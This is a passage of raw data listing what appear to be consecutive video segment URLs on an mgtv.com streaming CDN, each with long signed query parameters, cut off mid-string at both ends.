QW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CB1F15FFD826277722445A90B4A1A96C_1260080_1270080_1737_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/890FED4B2371BAA9B06D7229E74C9C38_1270080_1280080_1207_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3C6FE67C913F9C1E86ED0EB7012B0154_1280080_1290080_1501_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5E7B7F94E32642A9A1F0DA9ACF60921B_1290080_1300080_2485_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/164D59603C9400E92F4E8C8E848D3B2B_1300080_1310080_1589_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/63B84B59E4E988D9CB42D87950835D7C_1310080_1320080_1074_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/26F9A2E4DD4B1CC449BB58E02C725F80_1320080_1330080_1171_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/86E4D7A2CE03D8D1AD9D3BF7A7E251DF_1330080_1340080_1284_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/1B4EF30F3520A77CF0AC330163EC3246_1340080_1350080_1637_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7D5B58327AFB655A8FC1B486C0CD1B0A_1350080_1360080_1166_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4A5496162692B592CEC1D7658AEAF5A4_1360080_1370080_840_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/54B0D85B1234909D0525DC21CE662C77_1370080_1380080_1213_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/44970D73ECB24651F824B9F4289AC4B8_1380080_1390080_1316_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A8D58B7E104783362F4406862C251C51_1390080_1400080_368_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/91E0D6EFD40AADA61132CFCCD39033E5_1400080_1410080_1344_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/84C4648B4B48743AB053110C710C5DFB_1410080_1420080_867_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3691E6317FAFAD4940FF890B1D98AEF2_1420080_1430080_444_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/413797F67F2DE9DA44CD24F0D0F38FA0_1430080_1440080_441_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C55F7C4F092886F24C2B8E6D19D422C7_1440080_1450080_447_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5C9B0B3C8AA6F5D011FD4196F8A86A88_1450080_1460080_1009_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/BC54858DC0CF98BDF94E070C06DC3713_1460080_1470080_1485_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxU